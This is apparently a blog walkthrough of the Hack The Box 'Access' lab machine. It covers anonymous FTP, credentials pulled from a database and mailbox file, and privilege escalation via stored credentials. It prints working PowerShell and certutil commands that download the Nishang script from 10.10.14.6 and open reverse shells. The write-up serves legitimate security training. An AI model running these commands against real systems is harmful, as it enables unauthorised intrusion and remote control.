Terence Fürst

Penetration Tester

Access HTB Walkthrough

Initial Enumeration

A quick scan of the target revealed the following open ports and services:

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open  telnet  Microsoft Windows XP telnetd
| telnet-ntlm-info:
|   Target_Name: ACCESS
|   NetBIOS_Domain_Name: ACCESS
|   NetBIOS_Computer_Name: ACCESS
|   DNS_Domain_Name: ACCESS
|   DNS_Computer_Name: ACCESS
|_  Product_Version: 6.1.7600
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
| http-methods:
|_  Potentially risky methods: TRACE
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

FTP (Port 21)

The FTP service allowed anonymous login, which I used to gain access. Once connected, I switched to binary mode with the command:

type binary

There were two files available for download:

backup.mdb
Access Control.zip

Upon attempting to extract the backup.zip, I encountered an error indicating that the file might be corrupted. However, I was able to open backup.mdb using DBeaver, where I discovered credentials in the auth_user table.

Next, I revisited the backup.zip file and successfully extracted it using 7-Zip. The extracted .pst file was opened in Outlook, where I uncovered additional credentials for the user security:

Username: security Password: 4Cc3ssC0ntr0ller

Telnet (Port 23)

With the newly discovered credentials, I logged into the system via Telnet:

Once logged in, I sought to establish a more stable shell. To achieve this, I used the following PowerShell command to initiate a reverse shell:

powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.6/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 3001

Setting Up the Reverse Shell

I hosted a web server on port 80 to serve the Nishang reverse TCP PowerShell script. Simultaneously, I prepared a listener on port 3001, where the reverse shell would connect back to my machine.

Escalating Privileges

After some investigation, I discovered that the command cmdkey /list could be used to view the stored credentials, revealing an administrative account.

With this information, I proceeded to execute a reverse shell in the context of the Administrator. First, I modified the Nishang reverse shell script by adding the following line at the bottom:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 4445

This ensured that the script would execute without requiring any additional parameters.

Next, I uploaded the modified script to the target system using certutil:

certutil -f -split -urlcache http://10.10.14.6/Invoke-PowerShellTcp.ps1

Finally, I used the runas command to execute the script as the Administrator:

runas /user:ACCESS\Administrator /savecred "powershell -ep bypass -File c:\users\security\downloads\Invoke-PowerShellTcp.ps1"

By listening on the specified port (4445), I successfully received the reverse shell under the Administrator context. From there, I was able to navigate to the Administrator’s desktop and retrieve the root.txt flag.

Previous Article
Next Article

Schreibe einen Kommentar

Your email address will not be published. Required fields are marked *.

*
*
You may use these <abbr title="HyperText Markup Language">HTML</abbr> tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>